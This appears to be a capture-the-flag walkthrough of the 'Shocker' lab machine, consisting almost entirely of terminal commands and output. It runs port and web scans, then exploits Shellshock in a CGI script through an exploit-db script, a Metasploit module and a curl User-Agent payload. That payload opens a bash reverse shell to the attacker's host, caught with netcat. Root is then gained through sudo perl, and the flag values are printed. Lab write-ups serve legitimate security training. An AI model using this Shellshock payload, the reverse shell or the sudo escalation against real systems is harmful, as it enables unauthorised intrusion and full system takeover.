Shocker

$ nmap -p- -T4 -A 10.10.10.56
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ dirb http://10.10.10.56
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)                                                                                                                             
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)                                                                                                                           
+ http://10.10.10.56/server-status (CODE:403|SIZE:299)  
$ nikto -h http://10.10.10.56
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8673 requests: 0 error(s) and 7 item(s) reported on remote host
DirBuster
http://shocker.htb/cgi-bin/
http://shocker.htb/cgi-bin/user.sh
shellshock (Apache mod_cgi)
$ wget https://exploit-db.com/download/34900
$ python 34900 payload=reverse rhost=10.10.10.56 lhost=10.10.14.136 lport=4444 pages=/cgi/bin/user.sh
$ msfconsole
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec 
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost 10.10.14.136
lhost => 10.10.14.136
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 10.10.10.56
rhost => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/user.sh
targeturi => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > check
[+] 10.10.10.56:80 - The target is vulnerable.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
meterpreter > cat user.txt
bb8993b669abf54fac2f0289c2082ae4
$ curl -H 'User-Agent: () { :; }; /bin/bash -i  >& /dev/tcp/10.10.14.136/4488 0>&1' http://10.10.10.56:80/cgi-bin/user.sh
kali@kali:~/0.htb/machines/Shocker56$ nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.136] from (UNKNOWN) [10.10.10.56] 38008
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ 
shelly@Shocker:/usr/lib$ cd /home
cd /home
shelly@Shocker:/home$ ls
ls
shelly
shelly@Shocker:/home$ cd shelly
cd shelly
shelly@Shocker:/home/shelly$ ls -la
ls -la
total 36
drwxr-xr-x 4 shelly shelly 4096 Sep 22  2017 .
drwxr-xr-x 3 root   root   4096 Sep 22  2017 ..
-rw------- 1 root   root      0 Sep 25  2017 .bash_history
-rw-r--r-- 1 shelly shelly  220 Sep 22  2017 .bash_logout
-rw-r--r-- 1 shelly shelly 3771 Sep 22  2017 .bashrc
drwx------ 2 shelly shelly 4096 Sep 22  2017 .cache
drwxrwxr-x 2 shelly shelly 4096 Sep 22  2017 .nano
-rw-r--r-- 1 shelly shelly  655 Sep 22  2017 .profile
-rw-r--r-- 1 root   root     66 Sep 22  2017 .selected_editor
-rw-r--r-- 1 shelly shelly    0 Sep 22  2017 .sudo_as_admin_successful
-r--r--r-- 1 root   root     33 Jul 21 13:35 user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
bb8993b669abf54fac2f0289c2082ae4
shelly@Shocker:/home/shelly$ 
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ 
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh"'
sudo /usr/bin/perl -e 'exec "/bin/sh"'
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat root.txt
d4244dc773bdc765d8e763659a63f565

Navigation